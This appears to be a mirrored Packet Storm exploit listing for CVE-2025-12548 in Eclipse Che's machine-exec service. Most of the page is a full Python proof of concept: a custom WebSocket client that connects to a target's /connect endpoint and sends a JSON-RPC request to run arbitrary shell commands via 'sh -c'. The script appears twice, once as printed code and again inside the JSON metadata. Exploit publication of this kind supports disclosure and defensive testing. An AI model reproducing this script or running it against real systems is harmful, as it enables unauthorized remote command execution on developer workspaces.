📄 Eclipse Che WebSocket Machine-Exec Remote Code Execution_PACKETSTORM:219562

9 / 10

CRITICAL

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

Description

This Python script is a WebSocket-based client designed to interact with an Eclipse Che / DevSpaces machine-exec service and test for an unauthenticated remote code execution vulnerability...

Visit Original Source

Basic Information

ID PACKETSTORM:219562

Published Apr 22, 2026 at 00:00

Affected Product

Affected Versions ==================================================================================================================================
| # Title : Eclipse Che WebSocket Machine-Exec RCE Exploit Client |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://github.com/eclipse-che/che-machine-exec |
==================================================================================================================================

[+] Summary : This Python script is a WebSocket-based client designed to interact with an Eclipse Che / DevSpaces machine-exec service and test for an unauthenticated remote code execution vulnerability (CVE-2025-12548).
It implements a custom WebSocket client from scratch, including the handshake process, frame construction, masking/unmasking, and response parsing.
The exploit class connects to a target service, performs a basic connectivity check, and then attempts
to send a JSON-RPC request that creates a remote process by executing a shell command (sh -c <cmd>).
The tool includes two main modes: a vulnerability check (to verify service responsiveness and potential exposure) and an execution routine
that attempts to trigger command execution remotely and extract a process identifier from the response.
Overall, it is a security testing utility focused on verifying and demonstrating potential RCE exposure in a specific Eclipse Che component through WebSocket communication.

[+] POC :

#!/usr/bin/env python3

import sys
import json
import base64
import hashlib
import secrets
import socket
import ssl
import argparse
import time

OPCODE_TEXT = 0x1
OPCODE_CLOSE = 0x8

class WebSocketClient:
GUID = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"

def __init__(self, host, port, path="/", use_ssl=False, timeout=10):
self.host = host
self.port = port
self.path = path
self.use_ssl = use_ssl
self.timeout = timeout
self.sock = None
self.connected = False

def connect(self):
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(self.timeout)

if self.use_ssl:
ctx = ssl.create_default_context()
self.sock = ctx.wrap_socket(sock, server_hostname=self.host)
else:
self.sock = sock

self.sock.connect((self.host, self.port))
self._handshake()
self.connected = True
return True

except Exception as e:
print(f"[-] Connection failed: {e}")
return False

def _handshake(self):
ws_key = base64.b64encode(secrets.token_bytes(16)).decode()

request = (
f"GET {self.path} HTTP/1.1\r\n"
f"Host: {self.host}:{self.port}\r\n"
"Upgrade: websocket\r\n"
"Connection: Upgrade\r\n"
f"Sec-WebSocket-Key: {ws_key}\r\n"
"Sec-WebSocket-Version: 13\r\n"
"\r\n"
)

self.sock.send(request.encode())

response = self.sock.recv(4096).decode(errors="ignore")

headers = {}
try:
header_block = response.split("\r\n\r\n", 1)[0]
for line in header_block.split("\r\n")[1:]:
if ":" in line:
k, v = line.split(":", 1)
headers[k.strip().lower()] = v.strip()
except:
pass

if "101" not in response:
raise Exception("Handshake failed (no 101 Switching Protocols)")

accept = headers.get("sec-websocket-accept", "")

expected = base64.b64encode(
hashlib.sha1((ws_key + self.GUID).encode()).digest()
).decode()

if accept != expected:
raise Exception("Invalid Sec-WebSocket-Accept")

def _recv_exact(self, n):
data = b""
while len(data) < n:
chunk = self.sock.recv(n - len(data))
if not chunk:
break
data += chunk
return data

def send_text(self, message):
if not self.connected:
return False

payload = message.encode()
frame = bytearray()

frame.append(0x80 | OPCODE_TEXT)

length = len(payload)

if length < 126:
frame.append(0x80 | length)
elif length < 65536:
frame.append(0x80 | 126)
frame.extend(length.to_bytes(2, "big"))
else:
frame.append(0x80 | 127)
frame.extend(length.to_bytes(8, "big"))

mask = secrets.token_bytes(4)
frame.extend(mask)

masked = bytes(b ^ mask[i % 4] for i, b in enumerate(payload))
frame.extend(masked)

self.sock.send(frame)
return True

def receive_frame(self):
try:
header = self._recv_exact(2)
if len(header) < 2:
return None

b1, b2 = header
opcode = b1 & 0x0F
length = b2 & 0x7F

if length == 126:
length = int.from_bytes(self._recv_exact(2), "big")
elif length == 127:
length = int.from_bytes(self._recv_exact(8), "big")

payload = self._recv_exact(length)

if opcode == OPCODE_CLOSE:
return None

return payload.decode(errors="ignore")

except Exception:
return None

def close(self):
try:
frame = bytearray([0x88, 0x00]) # close frame (no mask needed here simplification)
self.sock.send(frame)
except:
pass

try:
self.sock.close()
finally:
self.connected = False

class EclipseCheExploit:
def __init__(self, target, port, use_ssl=False, timeout=10):
self.target = target
self.port = port
self.use_ssl = use_ssl
self.timeout = timeout

def check_vuln(self):
print(f"[*] Checking {self.target}:{self.port}")

ws = WebSocketClient(self.target, self.port, "/connect", self.use_ssl, self.timeout)

if not ws.connect():
return False

hello = ws.receive_frame()
ws.close()

if hello and "connected" in hello:
print("[+] Target looks responsive (possible vulnerable service)")
return True

print("[-] Not vulnerable or no response")
return False

def execute(self, cmd):
ws = WebSocketClient(self.target, self.port, "/connect", self.use_ssl, self.timeout)

if not ws.connect():
return False

ws.receive_frame()

req = {
"jsonrpc": "2.0",
"method": "create",
"params": {
"cmd": ["sh", "-c", cmd],
"type": "process"
},
"id": 1
}

ws.send_text(json.dumps(req))
resp = ws.receive_frame()

ws.close()

if not resp:
print("[-] No response")
return False

try:
data = json.loads(resp)
pid = data.get("result")

if not pid:
print("[-] Failed to get process id")
return False

print(f"[+] Process ID: {pid}")

except:
print("[-] Invalid JSON")
return False

return True

def main():
parser = argparse.ArgumentParser()
parser.add_argument("target")
parser.add_argument("port", type=int, nargs="?", default=3333)
parser.add_argument("cmd", nargs="?", default="id")
parser.add_argument("--ssl", action="store_true")
parser.add_argument("--check-only", action="store_true")

args = parser.parse_args()

ex = EclipseCheExploit(args.target, args.port, args.ssl)

if args.check_only:
ex.check_vuln()
else:
if ex.check_vuln():
ex.execute(args.cmd)

if __name__ == "__main__":
main()

Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================

{
    "lastseen": "2026-04-22T17:00:03",
    "description": "This Python script is a WebSocket-based client designed to interact with an Eclipse Che / DevSpaces machine-exec service and test for an unauthenticated remote code execution vulnerability...",
    "published": "2026-04-22T00:00:00",
    "modified": "2026-04-22T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Eclipse Che WebSocket Machine-Exec Remote Code Execution",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:219562",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2025-12548"
    ],
    "sourceData": "==================================================================================================================================\n    | # Title     : Eclipse Che WebSocket Machine-Exec RCE Exploit Client                                                            |\n    | # Author    : indoushka                                                                                                        |\n    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |\n    | # Vendor    : https://github.com/eclipse-che/che-machine-exec                                                                  |\n    ==================================================================================================================================\n    \n    [+] Summary    : This Python script is a WebSocket-based client designed to interact with an Eclipse Che / DevSpaces machine-exec service and test for an unauthenticated remote code execution vulnerability (CVE-2025-12548).\n                     It implements a custom WebSocket client from scratch, including the handshake process, frame construction, masking/unmasking, and response parsing. \n    \t\t\t\t The exploit class connects to a target service, performs a basic connectivity check, and then attempts \n    \t\t\t\t to send a JSON-RPC request that creates a remote process by executing a shell command (sh -c <cmd>).\n                     The tool includes two main modes: a vulnerability check (to verify service responsiveness and potential exposure) and an execution routine \n    \t\t\t\t that attempts to trigger command execution remotely and extract a process identifier from the response.\n                     Overall, it is a security testing utility focused on verifying and demonstrating potential RCE exposure in a specific Eclipse Che component through WebSocket communication.\n    \n    [+] POC   :  \n    \n    #!/usr/bin/env python3\n    \n    import sys\n    import json\n    import base64\n    import hashlib\n    import secrets\n    import socket\n    import ssl\n    import argparse\n    import time\n    \n    \n    OPCODE_TEXT = 0x1\n    OPCODE_CLOSE = 0x8\n    \n    \n    class WebSocketClient:\n        GUID = \"258EAFA5-E914-47DA-95CA-C5AB0DC85B11\"\n    \n        def __init__(self, host, port, path=\"/\", use_ssl=False, timeout=10):\n            self.host = host\n            self.port = port\n            self.path = path\n            self.use_ssl = use_ssl\n            self.timeout = timeout\n            self.sock = None\n            self.connected = False\n    \n        def connect(self):\n            try:\n                sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n                sock.settimeout(self.timeout)\n    \n                if self.use_ssl:\n                    ctx = ssl.create_default_context()\n                    self.sock = ctx.wrap_socket(sock, server_hostname=self.host)\n                else:\n                    self.sock = sock\n    \n                self.sock.connect((self.host, self.port))\n                self._handshake()\n                self.connected = True\n                return True\n    \n            except Exception as e:\n                print(f\"[-] Connection failed: {e}\")\n                return False\n    \n        def _handshake(self):\n            ws_key = base64.b64encode(secrets.token_bytes(16)).decode()\n    \n            request = (\n                f\"GET {self.path} HTTP/1.1\\r\\n\"\n                f\"Host: {self.host}:{self.port}\\r\\n\"\n                \"Upgrade: websocket\\r\\n\"\n                \"Connection: Upgrade\\r\\n\"\n                f\"Sec-WebSocket-Key: {ws_key}\\r\\n\"\n                \"Sec-WebSocket-Version: 13\\r\\n\"\n                \"\\r\\n\"\n            )\n    \n            self.sock.send(request.encode())\n    \n            response = self.sock.recv(4096).decode(errors=\"ignore\")\n    \n            headers = {}\n            try:\n                header_block = response.split(\"\\r\\n\\r\\n\", 1)[0]\n                for line in header_block.split(\"\\r\\n\")[1:]:\n                    if \":\" in line:\n                        k, v = line.split(\":\", 1)\n                        headers[k.strip().lower()] = v.strip()\n            except:\n                pass\n    \n            if \"101\" not in response:\n                raise Exception(\"Handshake failed (no 101 Switching Protocols)\")\n    \n            accept = headers.get(\"sec-websocket-accept\", \"\")\n    \n            expected = base64.b64encode(\n                hashlib.sha1((ws_key + self.GUID).encode()).digest()\n            ).decode()\n    \n            if accept != expected:\n                raise Exception(\"Invalid Sec-WebSocket-Accept\")\n    \n        def _recv_exact(self, n):\n            data = b\"\"\n            while len(data) < n:\n                chunk = self.sock.recv(n - len(data))\n                if not chunk:\n                    break\n                data += chunk\n            return data\n    \n        def send_text(self, message):\n            if not self.connected:\n                return False\n    \n            payload = message.encode()\n            frame = bytearray()\n    \n            frame.append(0x80 | OPCODE_TEXT)\n    \n            length = len(payload)\n    \n            if length < 126:\n                frame.append(0x80 | length)\n            elif length < 65536:\n                frame.append(0x80 | 126)\n                frame.extend(length.to_bytes(2, \"big\"))\n            else:\n                frame.append(0x80 | 127)\n                frame.extend(length.to_bytes(8, \"big\"))\n    \n            mask = secrets.token_bytes(4)\n            frame.extend(mask)\n    \n            masked = bytes(b ^ mask[i % 4] for i, b in enumerate(payload))\n            frame.extend(masked)\n    \n            self.sock.send(frame)\n            return True\n    \n        def receive_frame(self):\n            try:\n                header = self._recv_exact(2)\n                if len(header) < 2:\n                    return None\n    \n                b1, b2 = header\n                opcode = b1 & 0x0F\n                length = b2 & 0x7F\n    \n                if length == 126:\n                    length = int.from_bytes(self._recv_exact(2), \"big\")\n                elif length == 127:\n                    length = int.from_bytes(self._recv_exact(8), \"big\")\n    \n                payload = self._recv_exact(length)\n    \n                if opcode == OPCODE_CLOSE:\n                    return None\n    \n                return payload.decode(errors=\"ignore\")\n    \n            except Exception:\n                return None\n    \n        def close(self):\n            try:\n                frame = bytearray([0x88, 0x00])  # close frame (no mask needed here simplification)\n                self.sock.send(frame)\n            except:\n                pass\n    \n            try:\n                self.sock.close()\n            finally:\n                self.connected = False\n    \n    \n    class EclipseCheExploit:\n        def __init__(self, target, port, use_ssl=False, timeout=10):\n            self.target = target\n            self.port = port\n            self.use_ssl = use_ssl\n            self.timeout = timeout\n    \n        def check_vuln(self):\n            print(f\"[*] Checking {self.target}:{self.port}\")\n    \n            ws = WebSocketClient(self.target, self.port, \"/connect\", self.use_ssl, self.timeout)\n    \n            if not ws.connect():\n                return False\n    \n            hello = ws.receive_frame()\n            ws.close()\n    \n            if hello and \"connected\" in hello:\n                print(\"[+] Target looks responsive (possible vulnerable service)\")\n                return True\n    \n            print(\"[-] Not vulnerable or no response\")\n            return False\n    \n        def execute(self, cmd):\n            ws = WebSocketClient(self.target, self.port, \"/connect\", self.use_ssl, self.timeout)\n    \n            if not ws.connect():\n                return False\n    \n            ws.receive_frame()\n    \n            req = {\n                \"jsonrpc\": \"2.0\",\n                \"method\": \"create\",\n                \"params\": {\n                    \"cmd\": [\"sh\", \"-c\", cmd],\n                    \"type\": \"process\"\n                },\n                \"id\": 1\n            }\n    \n            ws.send_text(json.dumps(req))\n            resp = ws.receive_frame()\n    \n            ws.close()\n    \n            if not resp:\n                print(\"[-] No response\")\n                return False\n    \n            try:\n                data = json.loads(resp)\n                pid = data.get(\"result\")\n    \n                if not pid:\n                    print(\"[-] Failed to get process id\")\n                    return False\n    \n                print(f\"[+] Process ID: {pid}\")\n    \n            except:\n                print(\"[-] Invalid JSON\")\n                return False\n    \n            return True\n    \n    \n    def main():\n        parser = argparse.ArgumentParser()\n        parser.add_argument(\"target\")\n        parser.add_argument(\"port\", type=int, nargs=\"?\", default=3333)\n        parser.add_argument(\"cmd\", nargs=\"?\", default=\"id\")\n        parser.add_argument(\"--ssl\", action=\"store_true\")\n        parser.add_argument(\"--check-only\", action=\"store_true\")\n    \n        args = parser.parse_args()\n    \n        ex = EclipseCheExploit(args.target, args.port, args.ssl)\n    \n        if args.check_only:\n            ex.check_vuln()\n        else:\n            if ex.check_vuln():\n                ex.execute(args.cmd)\n    \n    \n    if __name__ == \"__main__\":\n        main()\n    \n    Greetings to :==============================================================================\n    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|\n    ============================================================================================",
    "sourceHref": "https://packetstorm.news/download/219562",
    "cvss": {
        "score": 9,
        "severity": "CRITICAL",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/219562/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply